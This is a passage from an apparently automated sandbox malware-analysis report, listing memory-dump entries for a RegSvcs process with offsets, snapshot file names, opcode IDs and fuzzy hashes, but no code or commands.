                                                                                                                • Instruction Fuzzy Hash: A31102B5C002498FCB10CF9AD844BDEFBF4EB88224F15842AD929B7650C374A945CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.555092915.000000000167D000.00000040.00000001.sdmp, Offset: 0167D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_167d000_RegSvcs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 562721beb3282fd2a0cce747575559dcb3b89f7e32a1c6f6b3f57fd0c36588e6
                                                                                                                • Instruction ID: 3b901408a3bef3739d8220c57e8b920d70b76929a364adc565ebb972208aefe1
                                                                                                                • Opcode Fuzzy Hash: 562721beb3282fd2a0cce747575559dcb3b89f7e32a1c6f6b3f57fd0c36588e6
                                                                                                                • Instruction Fuzzy Hash: 6821F871504244DFEB05DF94DDC4B26BF65FF84328F248A69E9094B346C336D856CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.555182257.000000000168D000.00000040.00000001.sdmp, Offset: 0168D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_168d000_RegSvcs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0952cdb59444be9a369cbbc10641de47bd8c3819dd99482d65a298c9a96004bd
                                                                                                                • Instruction ID: deb408fbff096c77ced4d32a0f7e56d46ac13a1a349a1aa86e053b74ea108280
                                                                                                                • Opcode Fuzzy Hash: 0952cdb59444be9a369cbbc10641de47bd8c3819dd99482d65a298c9a96004bd
                                                                                                                • Instruction Fuzzy Hash: 43212271604204DFDB15EFA4D8C4B26BBA5FB84364F24CA69D90A4B386C736D847CA72
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.555182257.000000000168D000.00000040.00000001.sdmp, Offset: 0168D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_168d000_RegSvcs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4f8452ba9851627332db241daa4ac61b5c3b923693ea6b7e1f344f8c0881c7c0
                                                                                                                • Instruction ID: 6d26cfcbd5768f00cda4b0b20082d66e90f1edf800c9142a2603776fc6ccfd7f
                                                                                                                • Opcode Fuzzy Hash: 4f8452ba9851627332db241daa4ac61b5c3b923693ea6b7e1f344f8c0881c7c0
                                                                                                                • Instruction Fuzzy Hash: 3C219D755093808FDB12CF64D990B15BF71EB46214F28C6EAD8498B697C33A984BCB62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.555092915.000000000167D000.00000040.00000001.sdmp, Offset: 0167D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_167d000_RegSvcs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 979f001fcbb0c45d0b2bb7ca8105b2468487ef7bd4718e6c774501cbe6cc10b0
                                                                                                                • Instruction ID: d4f971914486184d9b0f8f505249fa4a5913ec86d011c5eaaa5207e8a2fd0273
                                                                                                                • Opcode Fuzzy Hash: 979f001fcbb0c45d0b2bb7ca8105b2468487ef7bd4718e6c774501cbe6cc10b0
                                                                                                                • Instruction Fuzzy Hash: F811BE76404280CFDB12CF54D9C4B16BF72FF84324F288AA9D8494B756C33AD45ACBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions